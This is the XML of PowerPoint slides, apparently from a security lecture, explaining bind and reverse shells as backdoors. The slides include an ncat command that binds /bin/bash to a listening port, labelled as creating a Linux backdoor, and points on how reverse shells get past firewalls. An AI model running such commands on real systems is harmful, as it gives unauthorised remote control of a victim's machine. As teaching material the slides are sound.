              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> a signal to activate the communication channel</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="53" name="Straight Arrow Connector 52"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5939975" y="2009485"/>
            <a:ext cx="4112859"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95B91847-4ACB-D04A-3B3A-37F13EEDEA78}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="10986207" y="2048722"/>
              <a:ext cx="360" cy="360"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="2" name="Ink 1">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{95B91847-4ACB-D04A-3B3A-37F13EEDEA78}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId7"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="10977567" y="2039722"/>
                <a:ext cx="18000" cy="18000"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </mc:Fallback>
      </mc:AlternateContent>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="44" name="TextBox 43"/>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984385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6082" y="683666"/>
            <a:ext cx="4483725" cy="1105055"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="86082" y="1924968"/>
            <a:ext cx="4166329" cy="3046988"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Server listens port </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>8080</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>: program to execute after connection occurs, connecting STDIN and STDOUT to the program</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cmd.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>: a shell command for Windows</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6502808" y="0"/>
            <a:ext cx="5689192" cy="6394221"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Left-Right Arrow 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4701377" y="1236193"/>
            <a:ext cx="1684075" cy="21106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
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="324536" y="6017257"/>
            <a:ext cx="4675064" cy="376966"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="3636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95220" numCol="1" anchor="ctr" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="1219170" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial Unicode MS" panose="020B0604020202020204" pitchFamily="34" charset="-128"/>
                <a:ea typeface="Monaco"/>
              </a:rPr>
              <a:t>ncat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial Unicode MS" panose="020B0604020202020204" pitchFamily="34" charset="-128"/>
                <a:ea typeface="Monaco"/>
              </a:rPr>
              <a:t> -l 10000 -e /bin/bash    //</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial Unicode MS" panose="020B0604020202020204" pitchFamily="34" charset="-128"/>
                <a:ea typeface="Monaco"/>
              </a:rPr>
              <a:t>if create a backdoor in Linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="800"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="324537" y="205173"/>
            <a:ext cx="2340641" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Start listener first</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="6" name="Straight Arrow Connector 5"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="2" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2587511" y="436006"/>
            <a:ext cx="77667" cy="70425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3" name="TextBox 12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4252411" y="126386"/>
            <a:ext cx="2024732" cy="318100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1467" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Start Client second</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="8" name="Straight Arrow Connector 7"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="13" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5264777" y="444486"/>
            <a:ext cx="1238032" cy="23918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43E7A8F8-8CEA-7F30-B0EF-A79C5B5E1DAC}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="4451087" y="4734999"/>
              <a:ext cx="1440" cy="360"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="3" name="Ink 2">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{43E7A8F8-8CEA-7F30-B0EF-A79C5B5E1DAC}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId5"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="4442447" y="4725999"/>
                <a:ext cx="19080" cy="18000"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </mc:Fallback>
      </mc:AlternateContent>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 13"/>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318379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Reverse Shell</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Subtitle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A new type of backdoor</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Number Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1" y="6470651"/>
            <a:ext cx="732367" cy="387349"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:fld id="{00000000-1234-1234-1234-123412341234}" type="slidenum">
              <a:rPr lang="en" smtClean="0"/>
              <a:pPr algn="ctr"/>
              <a:t>22</a:t>
            </a:fld>
            <a:endParaRPr lang="en"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4"/>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125122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Motivation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Normal backdoor at victim’s PC needs to be activate by the attacker</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Victim can setup a firewall to block the income connecting request</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2050" name="Picture 2" descr="Image result for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4518" y="4023199"/>
            <a:ext cx="5601588" cy="2195599"/>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743F91A7-6CB8-DB6A-2DDD-A6B0E1D0F328}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5935980" y="2324100"/>
            <a:ext cx="502920" cy="25222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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5810B019-E431-AF3A-5D0A-AB6946B1AA80}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5105400" y="2720340"/>
            <a:ext cx="5516880" cy="2125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B85E6CB-A996-659F-CCDB-CEA43CE67FF1}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="10490917" y="3355162"/>
              <a:ext cx="4320" cy="4680"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="2" name="Ink 1">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DB85E6CB-A996-659F-CCDB-CEA43CE67FF1}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId4"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="10482277" y="3346162"/>
                <a:ext cx="21960" cy="22320"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </mc:Fallback>
      </mc:AlternateContent>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7"/>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98983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bypass firewall?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="997233" y="1737116"/>
            <a:ext cx="8187200" cy="2559191"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Firewall doesn’t block signals sent from victims</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Let the victim sends the signal</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Let the attacker listen to the signal</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:fld id="{00000000-1234-1234-1234-123412341234}" type="slidenum">
              <a:rPr lang="en" smtClean="0"/>
              <a:pPr algn="l"/>
              <a:t>24</a:t>
            </a:fld>
            <a:endParaRPr lang="en"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 2" descr="Image result for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5750" y="1"/>
            <a:ext cx="5104285" cy="20006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5750" y="4296307"/>
            <a:ext cx="5104285" cy="2000676"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Right Arrow 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7885330" y="4420697"/>
            <a:ext cx="2631367" cy="14911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0000"/>
                </a:solidFill>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8482642" y="4010328"/>
            <a:ext cx="1811009" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Reverse shell</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BF0C4239-EDB3-A542-8E77-FE7AAEEB329A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="892788" y="4696480"/>
            <a:ext cx="6060558" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Think of it like a phone call in reverse. Instead of you calling someone else, the remote computer is calling the attacker's computer, and the attacker is able to answer the call and take control.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent6"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 11"/>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686110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shell definition</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Reverse shell is getting the connection from the victim or target to your computer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:fld id="{00000000-1234-1234-1234-123412341234}" type="slidenum">
              <a:rPr lang="en" smtClean="0"/>
              <a:pPr algn="l"/>
              <a:t>25</a:t>
            </a:fld>
            <a:endParaRPr lang="en"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3430879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Reverse shell demo</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="25" name="Group 24"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="691306" y="3101419"/>
            <a:ext cx="9244345" cy="2167923"/>
            <a:chOff x="1220568" y="4947656"/>
            <a:chExt cx="16789969" cy="4722849"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="26" name="pasted-image.tif"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="1220568" y="6319169"/>
              <a:ext cx="2050617" cy="2050617"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="12700">
              <a:miter lim="400000"/>
            </a:ln>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="28" name="Shape 201"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4531579" y="5705086"/>
              <a:ext cx="2122268" cy="1112395"/>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sz="2300"/>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr lvl="0">
                <a:defRPr sz="1800"/>
              </a:pPr>
              <a:r>
                <a:rPr sz="2133" dirty="0"/>
                <a:t>std input</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="29" name="Shape 202"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4550624" y="7663171"/>
              <a:ext cx="2164425" cy="1023276"/>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sz="2300"/>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr lvl="0">
                <a:defRPr sz="1800"/>
              </a:pPr>
              <a:r>
                <a:rPr sz="1867" dirty="0"/>
                <a:t>std output</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="30" name="Shape 203"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="3381619" y="6442023"/>
              <a:ext cx="1083158" cy="438163"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="25400">
              <a:solidFill/>
              <a:miter lim="400000"/>
              <a:tailEnd type="triangle"/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr lIns="90313" tIns="90313" rIns="90313" bIns="90313" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr lvl="0">
                <a:defRPr sz="2400"/>
              </a:pPr>
              <a:endParaRPr sz="4267"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="31" name="Shape 204"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3321689" y="7804900"/>
              <a:ext cx="1079942" cy="355834"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="25400">
              <a:solidFill/>
              <a:miter lim="400000"/>
              <a:tailEnd type="triangle"/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr lIns="90313" tIns="90313" rIns="90313" bIns="90313" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr lvl="0">
                <a:defRPr sz="2400"/>
              </a:pPr>
              <a:endParaRPr sz="4267"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="32" name="Picture 31"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="6579816" y="6023612"/>
              <a:ext cx="5434477" cy="101603"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="33" name="Picture 32"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="6579818" y="6463892"/>
              <a:ext cx="5434478" cy="101604"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="34" name="Picture 33"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="6579818" y="7937137"/>
              <a:ext cx="5434478" cy="101604"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="35" name="Picture 34"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="6579818" y="8428218"/>
              <a:ext cx="5434478" cy="101604"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
